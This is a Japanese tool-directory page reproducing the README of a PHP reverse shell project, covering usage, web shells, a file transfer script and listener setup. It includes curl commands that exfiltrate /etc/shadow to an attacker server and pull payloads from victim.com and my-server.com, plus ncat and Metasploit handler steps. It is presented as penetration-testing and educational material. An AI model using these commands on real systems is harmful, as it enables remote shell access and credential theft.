Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/ivan-sincek/php-reverse-shell
エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテスト学習と教育レッドチーミングリモートアクセスツール
GitHubivan-sincek/php-reverse-shell

php-reverse-shell

Linux OS、macOS、Windows OSで動作するPHPシェル。

リポジトリを見る
5711605ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PHP リバースシェル

人気のあるPHPリバースシェルスクリプト pentestmonkey/php-reverse-shell を少しリフレッシュしたものです。元の作者にクレジットを捧げます!

Linux OSおよびmacOSでは /bin/sh で、Windows OSでは cmd.exe で動作します。スクリプトは基盤となるOSを自動検出します。

ncat と multi/handler の両方で動作します。

以下でテスト済み:

  • Kali Linux v2020.2 (64ビット) 上の XAMPP for Linux v7.3.19 / PHP v7.3.19、
  • macOS Catalina v10.15.6 (64ビット) 上の XAMPP for OS X v7.4.10 / PHP v7.4.10、
  • Windows 10 Enterprise OS (64ビット) 上の XAMPP for Windows v7.4.3 / PHP v7.4.3、
  • PHP v4.4.0 を使用した Dockerイメージ nouphet/docker-php4、
  • PHP v5.2.17 を使用した Dockerイメージ steeze/php52-nginx。

Windows OS のプロセスパイプは非同期操作をサポートしていないため、stream_set_blocking()、stream_select()、および feof() は正常に動作しませんが、回避策を見つけました。

教育目的で作成しました。お役に立てば幸いです!

目次

  • リバースシェル
  • ウェブシェル
  • ファイルアップロード/ダウンロードスクリプト
    • ケース1: 被害者サーバーにスクリプトをアップロードする場合
    • ケース2: 自分のサーバーにスクリプトをアップロードする場合
  • リスナーのセットアップ
  • 画像

リバースシェル

/src/reverse/php_reverse_shell.php にはPHP v5.0.0以上が必要です。

/src/reverse/php_reverse_shell_older.php にはPHP v4.3.0以上が必要です。

必要に応じて、スクリプト内のIPアドレスとポート番号を変更してください。

/src/reverse/php_reverse_shell.php をサーバーのWebルートディレクトリ(例: XAMPPでは /opt/lampp/htdocs/)にコピーするか、ターゲットのWebサーバーにアップロードしてください。

お好みのWebブラウザでそのファイルにアクセスしてください。

ウェブシェル

HTTP POSTリクエストに基づく シンプルなPHPウェブシェル を確認してください。

HTTP GETリクエストに基づく シンプルなPHPウェブシェル を確認してください。コマンドを URLエンコード する必要があります。

HTTP GETリクエストに基づく シンプルなPHPウェブシェルv2 を確認してください。コマンドを URLエンコード する必要があります。

ファイルアップロード/ダウンロードスクリプト

ファイルアップロード用のHTTP POSTリクエストとファイルダウンロード用のHTTP GETリクエストに基づく シンプルなPHPファイルアップロード/ダウンロードスクリプト を確認してください。

ファイルをダウンロードするときは、ファイルパスを URLエンコード する必要があります。

サーバー設定によっては、HTTP GETリクエストパラメータによるファイルダウンロードが常に機能するとは限らないため、代わりにスクリプト内にファイルパスをハードコードする必要があります。

ケース1: 被害者サーバーにスクリプトをアップロードする場合

お好みのWebブラウザで被害者のWebサーバー上のスクリプトにアクセスするか、PCからcURLを使用してください。

PCからサーバーのWebルートディレクトリにファイルをアップロードします:

root@kitploit:~
curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe

サーバーからPCにファイルをダウンロードします:

root@kitploit:~
curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow

リバースシェル内で初期権限を昇格させた場合、このスクリプトはシェルと同じ権限を持たない可能性があります。その場合、特定のファイルをダウンロードするには、ファイルをWebルートディレクトリにコピーし、必要な読み取り権限を設定する必要があるかもしれません。

ケース2: 自分のサーバーにスクリプトをアップロードする場合

PHPリバースシェルから、以下のcURLコマンドを実行します。

被害者のPCから自分のサーバーのWebルートディレクトリにファイルをアップロードします:

root@kitploit:~
curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow

自分のサーバーのWebルートディレクトリから被害者のPCにファイルをダウンロードします:

root@kitploit:~
curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe

curl -skL -X GET https://my-server.com/payload.exe -o payload.exe

リスナーのセットアップ

リスナーをセットアップするには、Kali Linuxでお好みのコンソールを開き、以下のいずれかの例を実行します。

ncat リスナーをセットアップします:

root@kitploit:~
ncat -nvlp 9000

multi/handler リスナーをセットアップします:

root@kitploit:~
msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

画像

Ncat

図1 - Ncat

Script Dump

図2 - スクリプトのダンプ

ツールをダウンロード